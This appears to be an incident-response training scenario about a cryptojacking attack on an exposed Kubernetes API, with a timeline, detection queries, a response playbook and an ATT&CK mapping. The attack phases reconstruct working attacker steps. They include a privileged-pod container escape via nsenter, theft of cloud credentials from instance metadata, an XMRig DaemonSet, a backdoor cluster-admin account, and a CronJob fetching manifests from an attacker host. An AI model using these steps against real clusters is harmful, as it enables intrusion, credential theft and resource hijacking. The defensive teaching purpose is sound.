
SC-052: Cloud Cryptojacking Campaign

Scenario Overview

A threat actor discovers an exposed Kubernetes API server belonging to QuickPay Financial (a FinTech startup) through Shodan reconnaissance. The K8s API lacks authentication due to misconfigured RBAC policies, allowing the attacker to create privileged pods, deploy XMRig cryptocurrency miners across all available nodes, and laterally move to additional clusters in the same cloud account. The attack goes undetected for 23 days until the cloud provider sends an anomalous billing alert showing a $180K/month spike. During this period, production application performance degrades significantly, causing customer-facing latency issues.

Environment: QuickPay Financial AWS account; EKS clusters in us-east-1 and eu-west-1; Kubernetes v1.28
Initial Access: Exposed Kubernetes API server with anonymous authentication enabled (T1078.001)
Impact: $180K/month cloud bill spike, production performance degradation, customer-facing latency
Difficulty: Intermediate
Sector: FinTech / Financial Services


Attack Timeline

| Timestamp (UTC) | Phase | Action |
|---|---|---|
| 2026-02-10 (Day -23) | Reconnaissance | Shodan scan identifies exposed K8s API at 192.0.2.50:6443 |
| 2026-02-10 14:30:00 | Initial Access | Attacker connects to unauthenticated K8s API; enumerates cluster |
| 2026-02-10 14:45:00 | Discovery | Lists namespaces, nodes, service accounts, and secrets |
| 2026-02-10 15:00:00 | Execution | Creates privileged pod with host mount in kube-system namespace |
| 2026-02-10 15:05:00 | Privilege Escalation | Escapes container via nsenter to host; accesses node kubelet |
| 2026-02-10 15:30:00 | Resource Hijacking | Deploys XMRig DaemonSet across all nodes (8 nodes, 64 vCPUs) |
| 2026-02-11 02:00:00 | Persistence | Creates CronJob for miner redeployment; backdoor ServiceAccount |
| 2026-02-12 (Day -21) | Lateral Movement | Discovers and pivots to eu-west-1 cluster via shared IAM role |
| 2026-02-12 10:00:00 | Resource Hijacking | Deploys miners to second cluster (12 nodes, 96 vCPUs) |
| 2026-02-15 (Day -18) | Defense Evasion | Renames miner pods to resemble system components |
| 2026-02-20 (Day -13) | Impact | Production latency spikes; SRE team attributes to "traffic growth" |
| 2026-03-01 (Day -4) | Impact | AWS billing alert: $180K projected monthly spend (baseline: $22K) |
| 2026-03-05 09:00:00 | Detection | Finance team escalates billing anomaly to engineering |
| 2026-03-05 11:00:00 | Investigation | SRE discovers unauthorized pods running XMRig |

Technical Analysis

Phase 1: Reconnaissance — Shodan Discovery

The attacker identifies the exposed Kubernetes API through internet-wide scanning services.

# Shodan query used by attacker (reconstructed):
# "kubernetes" port:6443 "200 OK"
# OR
# ssl:"kubernetes" port:6443 country:US

# Shodan result for target:
# IP: 192.0.2.50
# Port: 6443/tcp
# Product: Kubernetes API
# SSL: kubernetes (CN=kube-apiserver)
# HTTP Response: 200 OK
# Banner excerpt:
# {
#   "kind": "APIVersions",
#   "versions": ["v1"],
#   "serverAddressByClientCIDRs": [
#     {"clientCIDR": "0.0.0.0/0", "serverAddress": "192.0.2.50:6443"}
#   ]
# }

# The API server responds to unauthenticated requests
# indicating anonymous authentication is enabled
# RBAC misconfiguration: system:anonymous bound to cluster-admin
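
On the defender side, the offending grant can be confirmed by searching RBAC for bindings whose subjects include anonymous or unauthenticated users. A minimal sketch, assuming kubectl and jq are available and pointed at the cluster:

```shell
# List ClusterRoleBindings that grant rights to system:anonymous or to the
# system:unauthenticated group (either is usable without any credentials)
kubectl get clusterrolebindings -o json | jq -r '
  .items[]
  | select(.subjects[]?
      | .name == "system:anonymous" or .name == "system:unauthenticated")
  | "\(.metadata.name) -> \(.roleRef.name)"'
# In this scenario, the output includes a binding to cluster-admin
```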

Phase 2: Initial Access and Cluster Enumeration

The attacker connects to the unauthenticated API and enumerates the cluster configuration.

# Attacker's kubectl commands (reconstructed from K8s audit logs)
# Source IP: 203.0.113.88

# Verify access
kubectl --server=https://192.0.2.50:6443 --insecure-skip-tls-verify \
  auth can-i '*' '*'
# Response: yes (cluster-admin via anonymous binding)

# Enumerate cluster
kubectl --server=https://192.0.2.50:6443 --insecure-skip-tls-verify \
  get nodes -o wide
# NAME              STATUS   ROLES    AGE   VERSION   INTERNAL-IP    OS-IMAGE
# node-prod-01      Ready    <none>   90d   v1.28.4   10.0.1.11      Amazon Linux 2
# node-prod-02      Ready    <none>   90d   v1.28.4   10.0.1.12      Amazon Linux 2
# ... (8 nodes total, m5.2xlarge instances — 8 vCPU / 32 GB each)

# List namespaces
kubectl get namespaces
# NAME              STATUS   AGE
# default           Active   120d
# kube-system       Active   120d
# production        Active   90d
# staging           Active   85d
# monitoring        Active   60d

# Enumerate secrets (looking for cloud credentials)
kubectl get secrets --all-namespaces -o json
# Found: AWS IAM role credentials in kube-system namespace
# ServiceAccount: aws-node (with cross-cluster IAM role)

# List service accounts
kubectl get serviceaccounts --all-namespaces
# Found: default SA in each namespace with automounted tokens

Phase 3: Privileged Pod Creation and Container Escape

The attacker creates a privileged pod with host filesystem access to escape the container.

# Privileged pod manifest (from K8s audit log)
# Created by: system:anonymous
# Source IP: 203.0.113.88
apiVersion: v1
kind: Pod
metadata:
  name: kube-proxy-health
  namespace: kube-system
  labels:
    k8s-app: kube-proxy
spec:
  hostPID: true
  hostNetwork: true
  containers:
  - name: health-check
    image: alpine:latest
    command: ["/bin/sh", "-c", "sleep infinity"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: host-root
      mountPath: /host
  volumes:
  - name: host-root
    hostPath:
      path: /
      type: Directory
  tolerations:
  - operator: Exists
  nodeSelector:
    kubernetes.io/os: linux

# Container escape via nsenter (from container runtime logs)
# Attacker execs into the privileged pod:
kubectl exec -it kube-proxy-health -n kube-system -- /bin/sh

# Inside the pod — escape to host:
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash

# Now running as root on the host node
# Verify access:
whoami
# root

# Access kubelet credentials:
cat /var/lib/kubelet/kubeconfig
# Contains kubelet client certificate with node-level access

# Access AWS instance metadata (IMDSv1 still allowed; IMDSv2 not enforced):
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Response: eks-node-role
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/eks-node-role
# Returns temporary AWS credentials for the node IAM role

Phase 4: Cryptominer Deployment via DaemonSet

The attacker deploys XMRig as a DaemonSet to mine Monero on all cluster nodes simultaneously.

# Cryptominer DaemonSet (from K8s audit log)
# Created by: system:anonymous
# Disguised as system monitoring component
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: node-metrics-collector
  namespace: kube-system
  labels:
    k8s-app: node-metrics
spec:
  selector:
    matchLabels:
      k8s-app: node-metrics
  template:
    metadata:
      labels:
        k8s-app: node-metrics
    spec:
      containers:
      - name: collector
        image: 203.0.113.99:5000/metrics-agent:latest
        # Actually contains XMRig cryptocurrency miner
        resources:
          requests:
            cpu: "6"
            memory: "2Gi"
          limits:
            cpu: "7"
            memory: "4Gi"
        env:
        - name: POOL_URL
          value: "stratum+tcp://pool.mining.example.com:3333"
        - name: WALLET
          value: "REDACTED"
        - name: WORKER_NAME
          valueFrom:
            fieldRef:
              fieldPath: spec.nodeName
        - name: CPU_THREADS
          value: "6"
      tolerations:
      - operator: Exists
      priorityClassName: system-node-critical

# XMRig configuration (extracted from container image)
{
    "autosave": false,
    "cpu": {
        "enabled": true,
        "huge-pages": true,
        "max-threads-hint": 85
    },
    "pools": [
        {
            "url": "stratum+tcp://pool.mining.example.com:3333",
            "user": "REDACTED",
            "pass": "x",
            "keepalive": true,
            "tls": false
        }
    ],
    "donate-level": 0
}

# Resource consumption per node:
# CPU usage: 85% of available cores (6 of 8 vCPUs per node)
# Total compute hijacked: 160 vCPUs across 20 nodes (both clusters),
# of which ~120 vCPUs are actively consumed by miners (6 threads per node)
# Estimated mining revenue: ~$800/day in Monero
# Victim cloud cost: ~$6,000/day in compute charges

Phase 5: Persistence Mechanisms

The attacker establishes multiple persistence mechanisms to survive pod restarts and cleanups.

# CronJob for miner redeployment (from K8s audit log)
apiVersion: batch/v1
kind: CronJob
metadata:
  name: system-maintenance
  namespace: kube-system
spec:
  schedule: "*/30 * * * *"
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - name: maintenance
            image: bitnami/kubectl:latest
            command:
            - /bin/sh
            - -c
            - |
              kubectl get ds node-metrics-collector -n kube-system || \
              kubectl apply -f https://203.0.113.99/manifests/ds.yaml
          restartPolicy: OnFailure
          serviceAccountName: backdoor-sa

# Backdoor ServiceAccount creation (from K8s audit log)
kubectl create serviceaccount backdoor-sa -n kube-system
kubectl create clusterrolebinding backdoor-binding \
  --clusterrole=cluster-admin \
  --serviceaccount=kube-system:backdoor-sa

# Token extraction for persistent access:
kubectl create token backdoor-sa -n kube-system --duration=8760h
# Returns: eyJhbGciOiJSUzI1NiIsI... (valid for 1 year)

Phase 6: Lateral Movement to Second Cluster

The attacker discovers and pivots to the eu-west-1 cluster using shared IAM credentials.

# Lateral movement via AWS IAM (from CloudTrail logs)
# The node IAM role has permissions to describe and access other EKS clusters

# Discover clusters in the account:
aws eks list-clusters --region eu-west-1
# Output: { "clusters": ["quickpay-prod-eu"] }

# Get cluster credentials:
aws eks update-kubeconfig --name quickpay-prod-eu --region eu-west-1

# Verify access:
kubectl get nodes
# NAME              STATUS   ROLES    AGE   VERSION   INTERNAL-IP
# node-eu-01        Ready    <none>   45d   v1.28.4   10.1.1.11
# ... (12 nodes total, m5.2xlarge — 96 vCPUs)

# Deploy same DaemonSet to eu-west-1 cluster:
kubectl apply -f ds.yaml -n kube-system
# daemonset.apps/node-metrics-collector created

# Combined compute hijacked: 160 vCPUs across 20 nodes in 2 clusters
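
From the defender's perspective, this pivot leaves CloudTrail records (eks:ListClusters, eks:DescribeCluster) attributed to the node role. A sketch of hunting for them with the AWS CLI; the time window matches this scenario's timeline:

```shell
# Hunt for EKS cluster enumeration during the pivot window
aws cloudtrail lookup-events --region eu-west-1 \
  --lookup-attributes AttributeKey=EventName,AttributeValue=ListClusters \
  --start-time 2026-02-12T00:00:00Z --end-time 2026-02-13T00:00:00Z \
  --query 'Events[].{Time:EventTime,User:Username}'
# ListClusters calls sourced from an EC2 node role (eks-node-role) rather
# than deployment tooling are a strong lateral-movement indicator
```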

Detection Opportunities

KQL — Kubernetes Anonymous Authentication Access

// Detect anonymous or unauthenticated access to Kubernetes API
AzureDiagnostics
| where TimeGenerated > ago(24h)
| where Category == "kube-audit"
| where log_s has "system:anonymous" or log_s has "system:unauthenticated"
| extend AuditEvent = parse_json(log_s)
| where AuditEvent.verb in ("create", "update", "patch", "delete", "get", "list")
| project TimeGenerated,
    Verb = tostring(AuditEvent.verb),
    Resource = tostring(AuditEvent.objectRef.resource),
    Namespace = tostring(AuditEvent.objectRef.namespace),
    SourceIP = tostring(AuditEvent.sourceIPs[0]),
    UserAgent = tostring(AuditEvent.userAgent)
| sort by TimeGenerated desc

KQL — Privileged Container Creation

// Detect creation of privileged containers or containers with hostPID/hostNetwork
AzureDiagnostics
| where TimeGenerated > ago(7d)
| where Category == "kube-audit"
| extend AuditEvent = parse_json(log_s)
| where AuditEvent.verb == "create"
| where AuditEvent.objectRef.resource == "pods"
| extend PodSpec = tostring(AuditEvent.requestObject.spec)
| where PodSpec has "privileged" or PodSpec has "hostPID"
    or PodSpec has "hostNetwork" or PodSpec has "hostPath"
| project TimeGenerated,
    PodName = tostring(AuditEvent.objectRef.name),
    Namespace = tostring(AuditEvent.objectRef.namespace),
    User = tostring(AuditEvent.user.username),
    SourceIP = tostring(AuditEvent.sourceIPs[0])
| sort by TimeGenerated desc

KQL — Cloud Cost Anomaly Detection

// Detect anomalous cloud compute cost spikes
AzureBillingUsage_CL
| where TimeGenerated > ago(30d)
| where MeterCategory_s == "Virtual Machines" or MeterCategory_s == "Container Instances"
| summarize DailyCost = sum(Cost_d) by bin(TimeGenerated, 1d)
| extend AvgCost = toscalar(
    AzureBillingUsage_CL
    | where TimeGenerated between (ago(60d) .. ago(30d))
    | where MeterCategory_s in ("Virtual Machines", "Container Instances")
    | summarize sum(Cost_d) / 30
  )
| where DailyCost > AvgCost * 3
| project TimeGenerated, DailyCost, AvgCost,
    CostMultiplier = round(DailyCost / AvgCost, 1)
| sort by TimeGenerated desc

KQL — Cryptocurrency Mining Network Indicators

// Detect connections to known mining pool ports and patterns
CommonSecurityLog
| where TimeGenerated > ago(24h)
| where DestinationPort in (3333, 3334, 5555, 5556, 7777, 8888, 9999, 14444, 14433)
| where DeviceAction == "Allow"
| summarize
    ConnectionCount = count(),
    UniqueDestinations = dcount(DestinationIP),
    TotalBytesSent = sum(SentBytes),
    Duration = datetime_diff('minute', max(TimeGenerated), min(TimeGenerated))
    by SourceIP, DestinationPort
| where ConnectionCount > 10
| where Duration > 30  // Persistent connections
| sort by ConnectionCount desc

SPL — Kubernetes Audit Log: Unauthorized API Access

index=kubernetes sourcetype="kube:apiserver:audit"
  user.username="system:anonymous" OR user.username="system:unauthenticated"
  verb IN ("create", "update", "delete", "patch")
| stats count as api_calls
        dc(objectRef.resource) as unique_resources
        values(objectRef.resource) as resources
        values(verb) as actions
        by sourceIPs{} userAgent
| where api_calls > 5
| sort -api_calls

SPL — DaemonSet Creation Detection

index=kubernetes sourcetype="kube:apiserver:audit"
  verb="create"
  objectRef.resource="daemonsets"
| stats count by objectRef.name objectRef.namespace
        user.username sourceIPs{} _time
| sort _time

SPL — High CPU Usage Across Kubernetes Nodes

index=metrics sourcetype="kube:metrics"
  metric_name="container_cpu_usage_seconds_total"
| bin _time span=1h
| stats avg(metric_value) as avg_cpu by kubernetes_node _time
| where avg_cpu > 0.80
| stats count as high_cpu_hours
        avg(avg_cpu) as sustained_cpu
        by kubernetes_node
| where high_cpu_hours > 12
| sort -sustained_cpu

SPL — Stratum Protocol Detection (Mining Pool Communication)

index=network sourcetype="bro:conn:json" OR sourcetype="zeek:conn"
  id.resp_p IN (3333, 3334, 5555, 7777, 14444)
| stats count as connections
        sum(orig_bytes) as bytes_sent
        sum(resp_bytes) as bytes_received
        sum(duration) as total_duration_secs
        values(id.resp_h) as destinations
        by id.orig_h
| where connections > 10
| eval duration_hours = round(total_duration_secs / 3600, 1)
| sort -connections

Response Playbook

Immediate Containment (0-30 minutes)

  1. Restrict K8s API access: Apply network policy or security group to block external access to port 6443
  2. Delete malicious workloads: Remove DaemonSet, CronJob, and privileged pods
  3. Revoke backdoor ServiceAccount: Delete backdoor-sa and its ClusterRoleBinding
  4. Block mining pool connections: Add firewall rules blocking Stratum protocol ports (3333, 5555, etc.)
  5. Enforce IMDSv2 on all EC2 instances to prevent metadata credential theft
  6. Rotate AWS IAM credentials associated with EKS node roles
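
A sketch of the containment commands, using the workload names from this scenario; the US cluster name, region, and instance ID are placeholders, and disabling the EKS public endpoint should be coordinated with anyone who depends on it:

```shell
# 1. Cut external access to the API server (disable the EKS public endpoint)
aws eks update-cluster-config --name quickpay-prod-us --region us-east-1 \
  --resources-vpc-config endpointPublicAccess=false,endpointPrivateAccess=true

# 2. Remove the malicious workloads (repeat per affected cluster)
kubectl delete daemonset node-metrics-collector -n kube-system
kubectl delete cronjob system-maintenance -n kube-system
kubectl delete pod kube-proxy-health -n kube-system

# 3. Revoke the backdoor ServiceAccount and its binding
kubectl delete clusterrolebinding backdoor-binding
kubectl delete serviceaccount backdoor-sa -n kube-system

# 5. Enforce IMDSv2 (repeat per node; instance ID is a placeholder)
aws ec2 modify-instance-metadata-options --instance-id i-0123456789abcdef0 \
  --http-tokens required --http-endpoint enabled
```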

Eradication (30 minutes - 4 hours)

  1. Audit Kubernetes RBAC: Remove anonymous/unauthenticated ClusterRoleBindings
  2. Enable K8s API authentication: Require OIDC or certificate-based authentication
  3. Scan all container images for cryptocurrency miners (check for xmrig, cpuminer binaries)
  4. Review all ServiceAccounts and remove unnecessary cluster-admin bindings
  5. Implement Pod Security Standards: Enforce restricted policy (no privileged pods, no hostPID)
  6. Rotate all secrets in the affected clusters (K8s secrets, ConfigMaps with credentials)
  7. Audit CloudTrail logs for unauthorized IAM actions from compromised node roles
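
Steps 1 and 5 can be verified and applied with built-in tooling; the namespace list below comes from the enumeration output earlier in this scenario:

```shell
# Confirm anonymous users no longer hold broad rights (impersonation check)
kubectl auth can-i '*' '*' --as=system:anonymous
# Expected after cleanup: no

# Enforce the "restricted" Pod Security Standard on workload namespaces
for ns in default production staging monitoring; do
  kubectl label namespace "$ns" \
    pod-security.kubernetes.io/enforce=restricted \
    pod-security.kubernetes.io/warn=restricted --overwrite
done
```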

Recovery (4-48 hours)

  1. Implement OPA/Gatekeeper policies to prevent privileged pod creation
  2. Deploy Falco or runtime security for real-time container threat detection
  3. Set up cloud cost alerting with aggressive thresholds (50% above baseline)
  4. Implement network policies restricting pod egress to known-good destinations
  5. Enable Kubernetes audit logging to a centralized SIEM
  6. Restrict node IAM roles to minimum necessary permissions (no cross-cluster access)
  7. Deploy Kubernetes admission controller to block images from untrusted registries
  8. Conduct architecture review of cloud security posture with focus on K8s hardening
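
As one concrete form of step 4, a default-deny egress policy for the production namespace would also sever the Stratum connections seen in this attack; the DNS allowance shown is illustrative, and real workloads will need additional egress rules for their legitimate destinations:

```shell
kubectl apply -f - <<'EOF'
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-egress
  namespace: production
spec:
  podSelector: {}        # applies to every pod in the namespace
  policyTypes:
  - Egress
  egress:
  - to:                  # allow DNS so approved names still resolve
    - namespaceSelector: {}
    ports:
    - protocol: UDP
      port: 53
EOF
```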

MITRE ATT&CK Mapping

| Tactic | Technique ID | Technique Name | Scenario Phase |
|---|---|---|---|
| Reconnaissance | T1595.001 | Active Scanning: Scanning IP Blocks | Shodan discovery of K8s API |
| Initial Access | T1078.001 | Valid Accounts: Default Accounts | Anonymous (system:anonymous) K8s API access |
| Execution | T1609 | Container Administration Command | kubectl commands to deploy miners |
| Execution | T1610 | Deploy Container | Privileged pod and DaemonSet creation |
| Persistence | T1053.007 | Scheduled Task/Job: Container Orchestration Job | CronJob for miner redeployment |
| Privilege Escalation | T1611 | Escape to Host | nsenter container escape |
| Credential Access | T1552.005 | Unsecured Credentials: Cloud Instance Metadata API | Node IAM credentials via IMDSv1 |
| Defense Evasion | T1036.005 | Masquerading: Match Legitimate Name or Location | Pods named as system components |
| Discovery | T1613 | Container and Resource Discovery | K8s namespace and node enumeration |
| Lateral Movement | T1021.007 | Remote Services: Cloud Services | Pivot to second cluster via shared IAM role |
| Impact | T1496 | Resource Hijacking | Cryptomining on 160 vCPUs |

Lessons Learned

  1. Kubernetes API servers must never be publicly accessible without authentication: The root cause was anonymous authentication enabled with cluster-admin privileges. The K8s API should be behind a private endpoint or VPN, with OIDC or certificate-based authentication enforced. Regular Shodan/Censys scans of your own infrastructure can identify these exposures before attackers do.

  2. RBAC misconfigurations are the most common Kubernetes attack vector: The binding of system:anonymous to cluster-admin is a critical misconfiguration. Automated RBAC auditing tools (like rbac-police or kubectl-who-can) should be run as part of CI/CD and regular security assessments.

  3. Pod Security Standards must be enforced: The attacker created privileged pods with hostPID and hostPath mounts, which are never needed for legitimate application workloads. Enforcing the "restricted" Pod Security Standard prevents container escapes and host access.

  4. Cloud cost monitoring is a legitimate security detection mechanism: The attack was ultimately detected through billing anomalies, not security tooling. Organizations should treat unexpected cost spikes as potential security incidents and integrate cloud cost alerts into their security monitoring workflow.

  5. Cross-cluster IAM permissions enable lateral movement: The shared IAM role between clusters allowed the attacker to pivot from us-east-1 to eu-west-1. Each cluster should use dedicated IAM roles with minimal permissions, and cross-cluster access should require explicit authentication.

  6. Runtime container security is essential: No runtime security tool (Falco, Sysdig, Aqua) was deployed to detect the container escape or cryptominer execution. Static scanning of container images is insufficient — runtime behavioral detection is needed to identify threats like cryptocurrency miners that may not be present in the original image.
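
A quick external self-check for lesson 1: probe your own API endpoint the way a scanner would. A hardened API server answers anonymous requests with 401 or 403; the exposed server in this scenario returned 200:

```shell
# Run from outside the VPC; the address is this scenario's exposed endpoint
curl -sk -o /dev/null -w '%{http_code}\n' https://192.0.2.50:6443/api
# 401 / 403 = anonymous access rejected (expected for a hardened cluster)
# 200      = anonymous access enabled (the misconfiguration exploited here)
```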


Cross-References